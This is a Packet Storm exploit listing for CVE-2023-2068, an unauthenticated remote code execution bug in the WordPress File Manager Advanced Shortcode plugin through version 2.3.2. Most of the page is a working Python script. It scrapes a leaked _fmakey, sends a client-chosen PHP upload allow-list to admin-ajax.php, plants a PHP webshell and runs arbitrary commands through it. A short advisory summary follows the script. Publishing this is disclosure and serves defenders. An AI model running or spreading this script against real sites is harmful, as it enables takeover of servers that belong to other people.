File Manager Advanced Shortcode 2.3.2 Remote Code Execution

File Manager Advanced Shortcode version 2.3.2 suffers from a remote code execution vulnerability.

Packet Storm
# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068

import json
import re
import sys

import requests

PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"

# Usage: python3 exploit.py IP COMMAND
if len(sys.argv) != 3:
    print(f'Use: {sys.argv[0]} IP COMMAND')
    sys.exit(1)
IP = sys.argv[1]
COMMAND = sys.argv[2]

# Step 1: the page that embeds the shortcode leaks the _fmakey value in its HTML,
# and the AJAX handler accepts that value from any visitor, so no login is needed.
url = 'http://' + IP + '/'  # Path to the page with the File Manager Advanced Shortcode panel
print(f"{PROCESS} Searching fmakey")
try:
    r = requests.get(url)
    fmakey = re.findall('_fmakey.*$', r.text, re.MULTILINE)[0].split("'")[1]
except (requests.RequestException, IndexError):
    fmakey = ''
if not fmakey:
    print(f"{FAIL} Cannot find fmakey!")
    sys.exit(1)

# Step 2: a single multipart POST to admin-ajax.php that carries the file manager's
# configuration (upload_allow=text/x-php is taken from the request, not from server-side
# settings) together with the PHP webshell upload itself.
print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
url = "http://" + IP + "/wp-admin/admin-ajax.php"
BOUNDARY = "----WebKitFormBoundaryI52DGCOt37rixRS1"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
    "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
    "Accept": "*/*",
}


def field(name, value):
    # One multipart form field using the fixed boundary declared in the Content-Type header.
    return "--" + BOUNDARY + "\r\nContent-Disposition: form-data; name=\"" + name + "\"\r\n\r\n" + value + "\r\n"


data = field("reqid", "")
data += field("cmd", "upload")
data += field("target", "l1_Lw")  # elFinder-style hash for the root of volume 1 ("Lw" is base64 for "/")
data += field("hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]", "exploit.php")
data += field("action", "fma_load_shortcode_fma_ui")
data += field("_fmakey", fmakey)
data += field("path", "")
data += field("url", "")
data += field("w", "false")
data += field("r", "true")
data += field("hide", "plugins")
data += field("operations", "upload,download")
data += field("path_type", "inside")
data += field("hide_path", "no")
data += field("enable_trash", "no")
data += field("upload_allow", "text/x-php")  # client-controlled allow-list: the core of the bug
data += field("upload_max_size", "2G")
# The webshell itself, declared with the MIME type the request just "allowed".
data += "--" + BOUNDARY + "\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
data += field("mtime[]", "") + "--" + BOUNDARY + "--\r\n"

print(f"{PROCESS} Sending AJAX request to: {url}")
r = requests.post(url, headers=headers, data=data)
if 'errUploadMime' in r.text:
    # elFinder-style error: the server-side MIME policy rejected the file (patched or hardened install).
    print(f'{FAIL} Exploit failed!')
    sys.exit(1)
elif r.headers.get('Content-Type', '').startswith("text/html"):
    print(f'{FAIL} Exploit failed! Try to change _fmakey')
    sys.exit(1)
else:
    print(f'{SUCCESS} Exploit executed with success!')

# Step 3: the JSON response lists the added file with its public URL; call the shell through it.
exploited = json.loads(r.text)
url = ""
print(f'{PROCESS} Getting URL with webshell')
for i in exploited["added"]:
    url = i['url']
print(f"{PROCESS} Executing '{COMMAND}'")
r = requests.get(url, params={'cmd': COMMAND})  # params= URL-encodes the command
print(f'{SUCCESS} The application returned ({len(r.text)} length):\n' + r.text)

Related news

WordPress File Manager Advanced Shortcode 2.3.2 Remote Code Execution

The WordPress File Manager Advanced Shortcode plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode: as the exploit above shows, the request to admin-ajax.php supplies its own upload_allow value, so the allow-list the upload is checked against is chosen by the client. This leads to remote code execution in cases where the configured MIME type list does not include PHP files. In the worst case, this is available to unauthenticated users, but it also works in an authenticated configuration. Versions 2.3.2 and below are affected. The Shortcode plugin depends on the File Manager Advanced plugin, and File Manager Advanced version 5.0.5 or lower must be installed for the configuration to remain vulnerable. Users of any privilege level can exploit this vulnerability, which results in access to the underlying operating system with the same privileges under which the WordPress web service runs.

CVE-2023-2068

The File Manager Advanced Shortcode WordPress plugin through 2.3.2 does not adequately prevent uploading files with disallowed MIME types when using the shortcode. This leads to RCE in cases where the allowed MIME type list does not include PHP files. In the worst case, this is available to unauthenticated users.
